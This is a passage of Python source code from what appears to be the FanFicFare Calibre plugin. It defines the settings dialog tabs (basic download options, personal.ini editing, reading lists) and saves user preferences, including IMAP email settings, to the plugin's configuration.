self.scroll_area.setFrameShape(QScrollArea.NoFrame)
self.scroll_area.setWidgetResizable(True)
self.l.addWidget(self.scroll_area)
tab_widget = QTabWidget(self)
self.scroll_area.setWidget(tab_widget)
self.basic_tab = BasicTab(self, plugin_action)
tab_widget.addTab(self.basic_tab, _('Basic'))
self.personalini_tab = PersonalIniTab(self, plugin_action)
tab_widget.addTab(self.personalini_tab, 'personal.ini')
self.readinglist_tab = ReadingListTab(self, plugin_action)
tab_widget.addTab(self.readinglist_tab, 'Reading Lists')
if 'Reading List' not in plugin_action.gui.iactions:
self.readinglist_tab.setEnabled(False)
self.calibrecover_tab = CalibreCoverTab(self, plugin_action)
tab_widget.addTab(self.calibrecover_tab, _('Calibre Cover'))
self.countpages_tab = CountPagesTab(self, plugin_action)
tab_widget.addTab(self.countpages_tab, 'Count Pages')
if 'Count Pages' not in plugin_action.gui.iactions:
self.countpages_tab.setEnabled(False)
self.std_columns_tab = StandardColumnsTab(self, plugin_action)
tab_widget.addTab(self.std_columns_tab, _('Standard Columns'))
self.cust_columns_tab = CustomColumnsTab(self, plugin_action)
tab_widget.addTab(self.cust_columns_tab, _('Custom Columns'))
self.imap_tab = ImapTab(self, plugin_action)
tab_widget.addTab(self.imap_tab, _('Email Settings'))
self.other_tab = OtherTab(self, plugin_action)
tab_widget.addTab(self.other_tab, _('Other'))
def save_settings(self):
with busy_cursor():
# basic
prefs['fileform'] = unicode(self.basic_tab.fileform.currentText())
prefs['collision'] = save_collisions[unicode(self.basic_tab.collision.currentText())]
prefs['updatemeta'] = self.basic_tab.updatemeta.isChecked()
prefs['bgmeta'] = self.basic_tab.bgmeta.isChecked()
prefs['keeptags'] = self.basic_tab.keeptags.isChecked()
prefs['mark'] = self.basic_tab.mark.isChecked()
prefs['mark_success'] = self.basic_tab.mark_success.isChecked()
prefs['mark_failed'] = self.basic_tab.mark_failed.isChecked()
prefs['mark_chapter_error'] = self.basic_tab.mark_chapter_error.isChecked()
prefs['showmarked'] = self.basic_tab.showmarked.isChecked()
prefs['autoconvert'] = self.basic_tab.autoconvert.isChecked()
prefs['show_est_time'] = self.basic_tab.show_est_time.isChecked()
prefs['urlsfromclip'] = self.basic_tab.urlsfromclip.isChecked()
prefs['button_instantpopup'] = self.basic_tab.button_instantpopup.isChecked()
prefs['updatedefault'] = self.basic_tab.updatedefault.isChecked()
prefs['deleteotherforms'] = self.basic_tab.deleteotherforms.isChecked()
prefs['adddialogstaysontop'] = self.basic_tab.adddialogstaysontop.isChecked()
prefs['lookforurlinhtml'] = self.basic_tab.lookforurlinhtml.isChecked()
prefs['checkforseriesurlid'] = self.basic_tab.checkforseriesurlid.isChecked()
prefs['auto_reject_seriesurlid'] = self.basic_tab.auto_reject_seriesurlid.isChecked()
prefs['mark_series_anthologies'] = self.basic_tab.mark_series_anthologies.isChecked()
prefs['checkforurlchange'] = self.basic_tab.checkforurlchange.isChecked()
prefs['injectseries'] = self.basic_tab.injectseries.isChecked()
prefs['matchtitleauth'] = self.basic_tab.matchtitleauth.isChecked()
prefs['do_wordcount'] = prefs_save_options[unicode(self.basic_tab.do_wordcount.currentText())]
prefs['smarten_punctuation'] = self.basic_tab.smarten_punctuation.isChecked()
prefs['reject_always'] = self.basic_tab.reject_always.isChecked()
prefs['reject_delete_default'] = self.basic_tab.reject_delete_default.isChecked()
if self.readinglist_tab:
# lists
prefs['send_lists'] = ', '.join([ x.strip() for x in unicode(self.readinglist_tab.send_lists_box.text()).split(',') if x.strip() ])
prefs['read_lists'] = ', '.join([ x.strip() for x in unicode(self.readinglist_tab.read_lists_box.text()).split(',') if x.strip() ])
# logger.debug("send_lists: %s"%prefs['send_lists'])
# logger.debug("read_lists: %s"%prefs['read_lists'])
prefs['addtolists'] = self.readinglist_tab.addtolists.isChecked()
prefs['addtoreadlists'] = self.readinglist_tab.addtoreadlists.isChecked()
prefs['addtolistsonread'] = self.readinglist_tab.addtolistsonread.isChecked()
prefs['autounnew'] = self.readinglist_tab.autounnew.isChecked()
# personal.ini
ini = self.personalini_tab.personalini
if ini:
prefs['personal.ini'] = ini
else:
# if they've removed everything, reset to default.
prefs['personal.ini'] = get_resources('plugin-example.ini')
prefs['cal_cols_pass_in'] = self.personalini_tab.cal_cols_pass_in.isChecked()
# Covers tab
prefs['updatecalcover'] = prefs_save_options[unicode(self.calibrecover_tab.updatecalcover.currentText())]
# for backward compatibility:
prefs['updatecover'] = prefs['updatecalcover'] == SAVE_YES
prefs['gencalcover'] = prefs_save_options[unicode(self.calibrecover_tab.gencalcover.currentText())]
prefs['calibre_gen_cover'] = self.calibrecover_tab.calibre_gen_cover.isChecked()
prefs['plugin_gen_cover'] = self.calibrecover_tab.plugin_gen_cover.isChecked()
prefs['gcnewonly'] = self.calibrecover_tab.gcnewonly.isChecked()
prefs['covernewonly'] = self.calibrecover_tab.covernewonly.isChecked()
gc_site_settings = {}
for (site,combo) in six.iteritems(self.calibrecover_tab.gc_dropdowns):
val = unicode(combo.itemData(combo.currentIndex()))
if val != 'none':
gc_site_settings[site] = val
#print("gc_site_settings[%s]:%s"%(site,gc_site_settings[site]))
prefs['gc_site_settings'] = gc_site_settings
prefs['allow_gc_from_ini'] = self.calibrecover_tab.allow_gc_from_ini.isChecked()
prefs['gc_polish_cover'] = self.calibrecover_tab.gc_polish_cover.isChecked()
# Count Pages tab
countpagesstats = []
if self.countpages_tab.pagecount.isChecked():
countpagesstats.append('PageCount')
if self.countpages_tab.wordcount.isChecked():
countpagesstats.append('WordCount')
if self.countpages_tab.fleschreading.isChecked():
countpagesstats.append('FleschReading')
if self.countpages_tab.fleschgrade.isChecked():
countpagesstats.append('FleschGrade')
if self.countpages_tab.gunningfog.isChecked():
countpagesstats.append('GunningFog')
prefs['countpagesstats'] = countpagesstats
prefs['wordcountmissing'] = self.countpages_tab.wordcount.isChecked() and self.countpages_tab.wordcountmissing.isChecked()
# Standard Columns tab
colsnewonly = {}
for (col,checkbox) in six.iteritems(self.std_columns_tab.stdcol_newonlycheck):
colsnewonly[col] = checkbox.isChecked()
prefs['std_cols_newonly'] = colsnewonly
prefs['suppressauthorsort'] = self.std_columns_tab.suppressauthorsort.isChecked()
prefs['suppresstitlesort'] = self.std_columns_tab.suppresstitlesort.isChecked()
prefs['authorcase'] = self.std_columns_tab.authorcase.isChecked()
prefs['titlecase'] = self.std_columns_tab.titlecase.isChecked()
prefs['setanthologyseries'] = self.std_columns_tab.setanthologyseries.isChecked()
prefs['set_author_url'] =self.std_columns_tab.set_author_url.isChecked()
prefs['set_series_url'] =self.std_columns_tab.set_series_url.isChecked()
prefs['includecomments'] =self.std_columns_tab.includecomments.isChecked()
prefs['anth_comments_newonly'] =self.std_columns_tab.anth_comments_newonly.isChecked()
# Custom Columns tab
# error column
prefs['errorcol'] = unicode(self.cust_columns_tab.errorcol.itemData(self.cust_columns_tab.errorcol.currentIndex()))
prefs['save_all_errors'] = self.cust_columns_tab.save_all_errors.isChecked()
# metadata column
prefs['savemetacol'] = unicode(self.cust_columns_tab.savemetacol.itemData(self.cust_columns_tab.savemetacol.currentIndex()))
# lastchecked column
prefs['lastcheckedcol'] = unicode(self.cust_columns_tab.lastcheckedcol.itemData(self.cust_columns_tab.lastcheckedcol.currentIndex()))
# cust cols tab
colsmap = {}
for (col,combo) in six.iteritems(self.cust_columns_tab.custcol_dropdowns):
val = unicode(combo.itemData(combo.currentIndex()))
if val != 'none':
colsmap[col] = val
#print("colsmap[%s]:%s"%(col,colsmap[col]))
prefs['custom_cols'] = colsmap
colsnewonly = {}
for (col,checkbox) in six.iteritems(self.cust_columns_tab.custcol_newonlycheck):
colsnewonly[col] = checkbox.isChecked()
prefs['custom_cols_newonly'] = colsnewonly
prefs['allow_custcol_from_ini'] = self.cust_columns_tab.allow_custcol_from_ini.isChecked()
prefs['imapserver'] = unicode(self.imap_tab.imapserver.text()).strip()
prefs['imapuser'] = unicode(self.imap_tab.imapuser.text()).strip()
prefs['imappass'] = unicode(self.imap_tab.imappass.text()).strip()
prefs['imapfolder'] = unicode(self.imap_tab.imapfolder.text()).strip()
# prefs['imaptags'] = unicode(self.imap_tab.imaptags.text()).strip()
prefs['imaptags'] = ', '.join([ x.strip() for x in unicode(self.imap_tab.imaptags.text()).split(',') if x.strip() ])
prefs['imapmarkread'] = self.imap_tab.imapmarkread.isChecked()
prefs['imapsessionpass'] = self.imap_tab.imapsessionpass.isChecked()
prefs['auto_reject_from_email'] = self.imap_tab.auto_reject_from_email.isChecked()
prefs['update_existing_only_from_email'] = self.imap_tab.update_existing_only_from_email.isChecked()
prefs['download_from_email_immediately'] = self.imap_tab.download_from_email_immediately.isChecked()
prefs.save_to_db()
self.plugin_action.set_popup_mode()
def edit_shortcuts(self):
self.save_settings()
# Force the menus to be rebuilt immediately, so we have all our actions registered
self.plugin_action.rebuild_menus()
d = KeyboardConfigDialog(self.plugin_action.gui, self.plugin_action.action_spec[0])
if d.exec_() == d.Accepted:
self.plugin_action.gui.keyboard.finalize()
class BasicTab(QWidget):
def __init__(self, parent_dialog, plugin_action):
self.parent_dialog = parent_dialog
self.plugin_action = plugin_action
QWidget.__init__(self)
topl = QVBoxLayout()
self.setLayout(topl)
label = QLabel(_('These settings control the basic features of the plugin--downloading FanFiction.'))
label.setWordWrap(True)
topl.addWidget(label)
defs_gb = groupbox = QGroupBox(_("Defaults Options on Download"))
self.l = QVBoxLayout()
groupbox.setLayout(self.l)
tooltip = _("On each download, FanFicFare offers an option to select the output format. <br />This sets what that option will default to.")
horz = QHBoxLayout()
label = QLabel(_('Default Output &Format:'))
label.setToolTip(tooltip)
horz.addWidget(label)
self.fileform = QComboBox(self)
self.fileform.addItem('epub')
self.fileform.addItem('mobi')
self.fileform.addItem('html')
self.fileform.addItem('txt')
self.fileform.setCurrentIndex(self.fileform.findText(prefs['fileform']))
self.fileform.setToolTip(tooltip)
self.fileform.activated.connect(self.set_collisions)
label.setBuddy(self.fileform)
horz.addWidget(self.fileform)
self.l.addLayout(horz)
tooltip = _("On each download, FanFicFare offers an option of what happens if that story already exists. <br />This sets what that option will default to.")
horz = QHBoxLayout()
label = QLabel(_('Default If Story Already Exists?'))
label.setToolTip(tooltip)
horz.addWidget(label)
self.collision = QComboBox(self)
# add collision options
self.set_collisions()
i = self.collision.findText(save_collisions[prefs['collision']])
if i > -1:
self.collision.setCurrentIndex(i)
self.collision.setToolTip(tooltip)
label.setBuddy(self.collision)
horz.addWidget(self.collision)
self.l.addLayout(horz)
horz = QHBoxLayout()
self.updatemeta = QCheckBox(_('Default Update Calibre &Metadata?'),self)
self.updatemeta.setToolTip(_("On each download, FanFicFare offers an option to update Calibre's metadata (title, author, URL, tags, custom columns, etc) from the web site. <br />This sets whether that will default to on or off. <br />Columns set to 'New Only' in the column tabs will only be set for new books."))
self.updatemeta.setChecked(prefs['updatemeta'])
horz.addWidget(self.updatemeta)
self.bgmeta = QCheckBox(_('Default Background Metadata?'),self)
self.bgmeta.setToolTip(_("On each download, FanFicFare offers an option to Collect Metadata from sites in a Background process.<br />This returns control to you quicker while updating, but you won't be asked for username/passwords or if you are an adult--stories that need those will just fail.<br />Only available for Update/Overwrite of existing books in case URL given isn't canonical or matches to existing book by Title/Author."))
self.bgmeta.setChecked(prefs['bgmeta'])
horz.addWidget(self.bgmeta)
self.l.addLayout(horz)
cali_gb = groupbox = QGroupBox(_("Updating Calibre Options"))
self.l = QVBoxLayout()
groupbox.setLayout(self.l)
self.deleteotherforms = QCheckBox(_('Delete other existing formats?'),self)
self.deleteotherforms.setToolTip(_('Check this to automatically delete all other ebook formats when updating an existing book.\nHandy if you have both a Nook(epub) and Kindle(mobi), for example.'))
self.deleteotherforms.setChecked(prefs['deleteotherforms'])
self.l.addWidget(self.deleteotherforms)
self.keeptags = QCheckBox(_('Keep Existing Tags when Updating Metadata?'),self)
self.keeptags.setToolTip(_("Existing tags will be kept and any new tags added.\n%(cmplt)s and %(inprog)s tags will be still be updated, if known.\n%(lul)s tags will be updated if %(lus)s in %(is)s.\n(If Tags is set to 'New Only' in the Standard Columns tab, this has no effect.)")%no_trans)
self.keeptags.setChecked(prefs['keeptags'])
self.l.addWidget(self.keeptags)
self.checkforseriesurlid = QCheckBox(_("Check for existing Series Anthology books?"),self)
self.checkforseriesurlid.setToolTip(_("Check for existing Series Anthology books using each new story's series URL before downloading.\nOffer to skip downloading if a Series Anthology is found.\nDoesn't work when Collect Metadata in Background is selected."))
self.checkforseriesurlid.setChecked(prefs['checkforseriesurlid'])
self.l.addWidget(self.checkforseriesurlid)
self.auto_reject_seriesurlid = QCheckBox(_("Reject Without Confirmation?"),self)
self.auto_reject_seriesurlid.setToolTip(_("Automatically reject storys with existing Series Anthology books.\nOnly works if 'Check for existing Series Anthology books' is on.\nDoesn't work when Collect Metadata in Background is selected."))
self.auto_reject_seriesurlid.setChecked(prefs['auto_reject_seriesurlid'])
self.auto_reject_seriesurlid.setEnabled(self.checkforseriesurlid.isChecked())
self.mark_series_anthologies = QCheckBox(_("Mark Matching Anthologies?"),self)
self.mark_series_anthologies.setToolTip(_("Mark and show existing Series Anthology books when individual updates are skipped.\nOnly works if 'Check for existing Series Anthology books' is on.\nDoesn't work when Collect Metadata in Background is selected."))
self.mark_series_anthologies.setChecked(prefs['mark_series_anthologies'])
self.mark_series_anthologies.setEnabled(self.checkforseriesurlid.isChecked())
def mark_anthologies():
self.auto_reject_seriesurlid.setEnabled(self.checkforseriesurlid.isChecked())
self.mark_series_anthologies.setEnabled(self.checkforseriesurlid.isChecked())
self.checkforseriesurlid.stateChanged.connect(mark_anthologies)
mark_anthologies()
horz = QHBoxLayout()
horz.addItem(QtGui.QSpacerItem(20, 1))
vertright = QVBoxLayout()
horz.addLayout(vertright)
vertright.addWidget(self.auto_reject_seriesurlid)
vertright.addWidget(self.mark_series_anthologies)
self.l.addLayout(horz)
self.checkforurlchange = QCheckBox(_("Check for changed Story URL?"),self)
self.checkforurlchange.setToolTip(_("Warn you if an update will change the URL of an existing book(normally automatic and silent).\nURLs may be changed from http to https silently if the site changed."))
self.checkforurlchange.setChecked(prefs['checkforurlchange'])
self.l.addWidget(self.checkforurlchange)
self.lookforurlinhtml = QCheckBox(_("Search inside ebooks for Story URL?"),self)
self.lookforurlinhtml.setToolTip(_("Look for first valid story URL inside EPUB, ZIP(HTML) or TXT ebook formats if not found in metadata.\nSomewhat risky, could find wrong URL depending on ebook content."))
self.lookforurlinhtml.setChecked(prefs['lookforurlinhtml'])
self.l.addWidget(self.lookforurlinhtml)
proc_gb = groupbox = QGroupBox(_("Post Processing Options"))
self.l = QVBoxLayout()
groupbox.setLayout(self.l)
self.mark = QCheckBox(_("Mark added/updated books when finished?"),self)
self.mark.setToolTip(_("Mark added/updated books when finished. Use with option below.\nYou can also manually search for 'marked:fff_success'.\n'marked:fff_failed' and 'marked:fff_chapter_error' are also available, or search 'marked:fff' for all."))
self.mark.setChecked(prefs['mark'])
self.l.addWidget(self.mark)
horz = QHBoxLayout()
horz.addItem(QtGui.QSpacerItem(20, 1))
self.l.addLayout(horz)
self.mark_success = QCheckBox(_("Success"),self)
self.mark_success.setToolTip(_("Mark successfully downloaded or updated books."))
self.mark_success.setChecked(prefs['mark_success'])
self.mark_success.setEnabled(self.checkforseriesurlid.isChecked())
horz.addWidget(self.mark_success)
self.mark_failed = QCheckBox(_("Failed"),self)
self.mark_failed.setToolTip(_("Mark failed downloaded or updated books."))
self.mark_failed.setChecked(prefs['mark_failed'])
self.mark_failed.setEnabled(self.checkforseriesurlid.isChecked())
horz.addWidget(self.mark_failed)
self.mark_chapter_error = QCheckBox(_("Chapter Error"),self)
self.mark_chapter_error.setToolTip(_("Mark downloaded or updated books with chapter errors (only when <i>continue_on_chapter_error:true</i>)."))
self.mark_chapter_error.setChecked(prefs['mark_chapter_error'])
self.mark_chapter_error.setEnabled(self.checkforseriesurlid.isChecked())
horz.addWidget(self.mark_chapter_error)
def mark_state():
self.mark_success.setEnabled(self.mark.isChecked())
self.mark_failed.setEnabled(self.mark.isChecked())
self.mark_chapter_error.setEnabled(self.mark.isChecked())
self.mark.stateChanged.connect(mark_state)
mark_state()
self.showmarked = QCheckBox(_("Show Marked books when finished?"),self)
self.showmarked.setToolTip(_("Show Marked added/updated books only when finished.\nYou can also manually search for 'marked:fff_success'.\n'marked:fff_failed' and 'marked:fff_chapter_error' are also available, or search 'marked:fff' for all."))
self.showmarked.setChecked(prefs['showmarked'])
self.l.addWidget(self.showmarked)
self.smarten_punctuation = QCheckBox(_('Smarten Punctuation (EPUB only)'),self)
self.smarten_punctuation.setToolTip(_("Run Smarten Punctuation from Calibre's Polish Book feature on each EPUB download and update."))
self.smarten_punctuation.setChecked(prefs['smarten_punctuation'])
self.l.addWidget(self.smarten_punctuation)
tooltip = _("Calculate Word Counts using Calibre internal methods.\n"
"Many sites include Word Count, but many do not.\n"
"This will count the words in each book and include it as if it came from the site.")
horz = QHBoxLayout()
label = QLabel(_('Calculate Word Count:'))
label.setToolTip(tooltip)
horz.addWidget(label)
self.do_wordcount = QComboBox(self)
for i in do_wordcount_order:
self.do_wordcount.addItem(i)
self.do_wordcount.setCurrentIndex(self.do_wordcount.findText(prefs_save_options[prefs['do_wordcount']]))
self.do_wordcount.setToolTip(tooltip)
label.setBuddy(self.do_wordcount)
horz.addWidget(self.do_wordcount)
self.l.addLayout(horz)
self.autoconvert = QCheckBox(_("Automatically Convert new/update books?"),self)
self.autoconvert.setToolTip(_("Automatically call calibre's Convert for new/update books.\nConverts to the current output format as chosen in calibre's\nPreferences->Behavior settings."))
self.autoconvert.setChecked(prefs['autoconvert'])
self.l.addWidget(self.autoconvert)
gui_gb = groupbox = QGroupBox(_("GUI Options"))
self.l = QVBoxLayout()
groupbox.setLayout(self.l)
self.urlsfromclip = QCheckBox(_('Take URLs from Clipboard?'),self)
self.urlsfromclip.setToolTip(_('Prefill URLs from valid URLs in Clipboard when Adding New.'))
self.urlsfromclip.setChecked(prefs['urlsfromclip'])
self.l.addWidget(self.urlsfromclip)
self.button_instantpopup = QCheckBox(_('FanFicFare button opens menu?'),self)
self.button_instantpopup.setToolTip(_('The FanFicFare toolbar button will bring up the plugin menu. If unchecked, it will <i>Download from URLs</i> or optionally Update, see below.'))
self.button_instantpopup.setChecked(prefs['button_instantpopup'])
self.l.addWidget(self.button_instantpopup)
self.updatedefault = QCheckBox(_('Default to Update when books selected?'),self)
self.updatedefault.setToolTip(_('The FanFicFare toolbar button will Update if books are selected. If unchecked, it will always <i>Download from URLs</i>.'))
self.updatedefault.setChecked(prefs['updatedefault'])
self.updatedefault.setEnabled(not self.button_instantpopup.isChecked())
self.button_instantpopup.stateChanged.connect(lambda x : self.updatedefault.setEnabled(not self.button_instantpopup.isChecked()))
horz = QHBoxLayout()
horz.addItem(QtGui.QSpacerItem(20, 1))
horz.addWidget(self.updatedefault)
self.l.addLayout(horz)
self.adddialogstaysontop = QCheckBox(_("Keep 'Add New from URL(s)' dialog on top?"),self)
self.adddialogstaysontop.setToolTip(_("Instructs the OS and Window Manager to keep the 'Add New from URL(s)'\ndialog on top of all other windows. Useful for dragging URLs onto it."))
self.adddialogstaysontop.setChecked(prefs['adddialogstaysontop'])
self.l.addWidget(self.adddialogstaysontop)
self.show_est_time = QCheckBox(_("Show estimated time left?"),self)
self.show_est_time.setToolTip(_("When a Progress Bar is shown, show a rough estimate of the time left."))
self.show_est_time.setChecked(prefs['show_est_time'])
self.l.addWidget(self.show_est_time)
misc_gb = groupbox = QGroupBox(_("Misc Options"))
self.l = QVBoxLayout()
groupbox.setLayout(self.l)
self.injectseries = QCheckBox(_("Inject calibre Series when none found?"),self)
self.injectseries.setToolTip(_("If no series is found, inject the calibre series (if there is one) so \nit appears on the FanFicFare title page(not cover)."))
self.injectseries.setChecked(prefs['injectseries'])
self.l.addWidget(self.injectseries)
self.matchtitleauth = QCheckBox(_("Search by Title/Author(s) for If Story Already Exists?"),self)
self.matchtitleauth.setToolTip(_("When checking <i>If Story Already Exists</i> FanFicFare will first match by URL Identifier. But if not found, it can also search existing books by Title and Author(s)."))
self.matchtitleauth.setChecked(prefs['matchtitleauth'])
self.l.addWidget(self.matchtitleauth)
rej_gb = groupbox = QGroupBox(_("Reject List"))
self.l = QVBoxLayout()
groupbox.setLayout(self.l)
self.rejectlist = QPushButton(_('Edit Reject URL List'), self)
self.rejectlist.setToolTip(_("Edit list of URLs FanFicFare will automatically Reject."))
self.rejectlist.clicked.connect(self.show_rejectlist)
self.l.addWidget(self.rejectlist)
self.reject_urls = QPushButton(_('Add Reject URLs'), self)
self.reject_urls.setToolTip(_("Add additional URLs to Reject as text."))
self.reject_urls.clicked.connect(self.add_reject_urls)
self.l.addWidget(self.reject_urls)
self.reject_reasons = QPushButton(_('Edit Reject Reasons List'), self)
self.reject_reasons.setToolTip(_("Customize the Reasons presented when Rejecting URLs"))
self.reject_reasons.clicked.connect(self.show_reject_reasons)
self.l.addWidget(self.reject_reasons)
self.reject_always = QCheckBox(_('Reject Without Confirmation?'),self)
self.reject_always.setToolTip(_("Always reject URLs on the Reject List without stopping and asking."))
self.reject_always.setChecked(prefs['reject_always'])
self.l.addWidget(self.reject_always)
self.reject_delete_default = QCheckBox(_('Delete on Reject by Default?'),self)
self.reject_delete_default.setToolTip(_("Should the checkbox to delete Rejected books be checked by default?"))
self.reject_delete_default.setChecked(prefs['reject_delete_default'])
self.l.addWidget(self.reject_delete_default)
topl.addWidget(defs_gb)
horz = QHBoxLayout()
vertleft = QVBoxLayout()
vertleft.addWidget(cali_gb)
vertleft.addWidget(proc_gb)
vertright = QVBoxLayout()
vertright.addWidget(gui_gb)
vertright.addWidget(misc_gb)
vertright.addWidget(rej_gb)
horz.addLayout(vertleft)
horz.addLayout(vertright)
topl.addLayout(horz)
topl.insertStretch(-1)
def set_collisions(self):
prev=self.collision.currentText()
self.collision.clear()
for o in collision_order:
if self.fileform.currentText() == 'epub' or o not in [UPDATE,UPDATEALWAYS]:
self.collision.addItem(o)
i = self.collision.findText(prev)
if i > -1:
self.collision.setCurrentIndex(i)
def show_rejectlist(self):
with busy_cursor():
d = RejectListDialog(self,
rejecturllist.get_list(),
rejectreasons=rejecturllist.get_reject_reasons(),
header=_("Edit Reject URLs List"),
show_delete=False,
show_all_reasons=False)
d.exec_()
if d.result() != d.Accepted:
return
with busy_cursor():
rejecturllist.add(d.get_reject_list(),clear=True)
def show_reject_reasons(self):
d = EditTextDialog(self,
prefs['rejectreasons'],
icon=self.windowIcon(),
title=_("Reject Reasons"),
label=_("Customize Reject List Reasons"),
tooltip=_("Customize the Reasons presented when Rejecting URLs"),
save_size_name='fff:Reject List Reasons')
d.exec_()
if d.result() == d.Accepted:
prefs['rejectreasons'] = d.get_plain_text()
def add_reject_urls(self):
d = EditTextDialog(self,
"http://example.com/story.php?sid=5,"+_("Reason why I rejected it")+"\nhttp://example.com/story.php?sid=6,"+_("Title by Author")+" - "+_("Reason why I rejected it"),
icon=self.windowIcon(),
title=_("Add Reject URLs"),
label=_("Add Reject URLs. Use: <b>http://...,note</b> or <b>http://...,title by author - note</b><br>Invalid story URLs will be ignored."),
tooltip=_("One URL per line:\n<b>http://...,note</b>\n<b>http://...,title by author - note</b>"),
rejectreasons=rejecturllist.get_reject_reasons(),
reasonslabel=_('Add this reason to all URLs added:'),
save_size_name='fff:Add Reject List')
d.exec_()
if d.result() == d.Accepted:
rejecturllist.add_text(d.get_plain_text(),d.get_reason_text())
class PersonalIniTab(QWidget):
def __init__(self, parent_dialog, plugin_action):
self.parent_dialog = parent_dialog
self.plugin_action = plugin_action
QWidget.__init__(self)
self.l = QVBoxLayout()
self.setLayout(self.l)
label = QLabel(_('These settings provide more detailed control over what metadata will be displayed inside the ebook as well as let you set %(isa)s and %(u)s/%(p)s for different sites.')%no_trans)
label.setWordWrap(True)
self.l.addWidget(label)
self.l.addSpacing(5)
self.personalini = prefs['personal.ini']
groupbox = QGroupBox(_("personal.ini"))
vert = QVBoxLayout()
groupbox.setLayout(vert)
self.l.addWidget(groupbox)
horz = QHBoxLayout()
vert.addLayout(horz)
self.ini_button = QPushButton(_('Edit personal.ini'), self)
#self.ini_button.setToolTip(_("Edit personal.ini file."))
self.ini_button.clicked.connect(self.add_ini_button)
horz.addWidget(self.ini_button)
label = QLabel(_("FanFicFare now includes find, color coding, and error checking for personal.ini editing. Red generally indicates errors."))
label.setWordWrap(True)
horz.addWidget(label)
vert.addSpacing(5)
horz = QHBoxLayout()
vert.addLayout(horz)
self.ini_button = QPushButton(_('View "Safe" personal.ini'), self)
#self.ini_button.setToolTip(_("Edit personal.ini file."))
self.ini_button.clicked.connect(self.safe_ini_button)
horz.addWidget(self.ini_button)
label = QLabel(_("View your personal.ini with usernames and passwords removed. For safely sharing your personal.ini settings with others."))
label.setWordWrap(True)
horz.addWidget(label)
self.l.addSpacing(5)
groupbox = QGroupBox(_("defaults.ini"))
horz = QHBoxLayout()
groupbox.setLayout(horz)
self.l.addWidget(groupbox)
view_label = _("View all of the plugin's configurable settings\nand their default settings.")
self.defaults = QPushButton(_('View Defaults')+' (plugin-defaults.ini)', self)
self.defaults.setToolTip(view_label)
self.defaults.clicked.connect(self.show_defaults)
horz.addWidget(self.defaults)
label = QLabel(view_label)
label.setWordWrap(True)
horz.addWidget(label)
self.l.addSpacing(5)
groupbox = QGroupBox(_("Calibre Columns"))
vert = QVBoxLayout()
groupbox.setLayout(vert)
self.l.addWidget(groupbox)
horz = QHBoxLayout()
vert.addLayout(horz)
pass_label = _("If checked, when updating/overwriting an existing book, FanFicFare will have the Calibre Columns available to use in replace_metadata, title_page, etc.<br>Click the button below to see the Calibre Column names.")%no_trans
self.cal_cols_pass_in = QCheckBox(_('Pass Calibre Columns into FanFicFare on Update/Overwrite')%no_trans,self)
self.cal_cols_pass_in.setToolTip(pass_label)
self.cal_cols_pass_in.setChecked(prefs['cal_cols_pass_in'])
horz.addWidget(self.cal_cols_pass_in)
label = QLabel(pass_label)
label.setWordWrap(True)
horz.addWidget(label)
vert.addSpacing(5)
horz = QHBoxLayout()
vert.addLayout(horz)
col_label = _("FanFicFare can pass the Calibre Columns into the download/update process.<br>This will show you the columns available by name.")
self.showcalcols = QPushButton(_('Show Calibre Column Names'), self)
self.showcalcols.setToolTip(col_label)
self.showcalcols.clicked.connect(self.show_showcalcols)
horz.addWidget(self.showcalcols)
label = QLabel(col_label)
label.setWordWrap(True)
horz.addWidget(label)
label = QLabel(_("Changes will only be saved if you click 'OK' to leave Customize FanFicFare."))
label.setWordWrap(True)
self.l.addWidget(label)
self.l.insertStretch(-1)
def show_defaults(self):
IniTextDialog(self,
get_resources('plugin-defaults.ini').decode('utf-8'),
icon=self.windowIcon(),
title=_('Plugin Defaults'),
label=_("Plugin Defaults (%s) (Read-Only)")%'plugin-defaults.ini',
use_find=True,
read_only=True,
save_size_name='fff:defaults.ini').exec_()
def safe_ini_button(self):
personalini = re.sub(r'((username|password) *[=:]).*$',r'\1XXXXXXXX',self.personalini,flags=re.MULTILINE)
d = EditTextDialog(self,
personalini,
icon=self.windowIcon(),
title=_("View 'Safe' personal.ini"),
label=_("View your personal.ini with usernames and passwords removed. For safely sharing your personal.ini settings with others."),
save_size_name='fff:safe personal.ini',
read_only=True)
d.exec_()
def add_ini_button(self):
d = IniTextDialog(self,
self.personalini,
icon=self.windowIcon(),
title=_("Edit personal.ini"),
label=_("Edit personal.ini"),
use_find=True,
save_size_name='fff:personal.ini')
d.exec_()
if d.result() == d.Accepted:
self.personalini = d.get_plain_text()
def show_showcalcols(self):
lines=[]#[('calibre_std_user_categories',_('User Categories'))]
for k,f in six.iteritems(field_metadata):
if f['name'] and k not in STD_COLS_SKIP: # only if it has a human readable name.
lines.append(('calibre_std_'+k,f['name']))
for k, column in six.iteritems(self.plugin_action.gui.library_view.model().custom_columns):
if k != prefs['savemetacol']:
# custom always have name.
lines.append(('calibre_cust_'+k[1:],column['name']))
lines.sort() # sort by key.
EditTextDialog(self,
'\n'.join(['%s (%s)'%(l,k) for (k,l) in lines]),
icon=self.windowIcon(),
title=_('Calibre Column Entry Names'),
label=_('Label (entry_name)'),
read_only=True,
save_size_name='fff:showcalcols').exec_()
class ReadingListTab(QWidget):
def __init__(self, parent_dialog, plugin_action):
self.parent_dialog = parent_dialog
self.plugin_action = plugin_action
QWidget.__init__(self)
self.l = QVBoxLayout()
self.setLayout(self.l)
try:
rl_plugin = plugin_action.gui.iactions['Reading List']
reading_lists = rl_plugin.get_list_names()
except KeyError:
reading_lists= []
label = QLabel(_('These settings provide integration with the %(rl)s Plugin. %(rl)s can automatically send to devices and change custom columns. You have to create and configure the lists in %(rl)s to be useful.')%no_trans)
label.setWordWrap(True)
self.l.addWidget(label)
self.l.addSpacing(5)
self.addtolists = QCheckBox(_('Add new/updated stories to "Send to Device" Reading List(s).'),self)
self.addtolists.setToolTip(_('Automatically add new/updated stories to these lists in the %(rl)s plugin.')%no_trans)
self.addtolists.setChecked(prefs['addtolists'])
self.l.addWidget(self.addtolists)
horz = QHBoxLayout()
label = QLabel(_('"Send to Device" Reading Lists'))
label.setToolTip(_("When enabled, new/updated stories will be automatically added to these lists."))
horz.addWidget(label)
self.send_lists_box = EditWithComplete(self)
self.send_lists_box.setToolTip(_("When enabled, new/updated stories will be automatically added to these lists."))
self.send_lists_box.update_items_cache(reading_lists)
self.send_lists_box.setText(prefs['send_lists'])
horz.addWidget(self.send_lists_box)
self.send_lists_box.setCursorPosition(0)
self.l.addLayout(horz)
self.addtoreadlists = QCheckBox(_('Add new/updated stories to "To Read" Reading List(s).'),self)
self.addtoreadlists.setToolTip(_('Automatically add new/updated stories to these lists in the %(rl)s plugin.\nAlso offers menu option to remove stories from the "To Read" lists.')%no_trans)
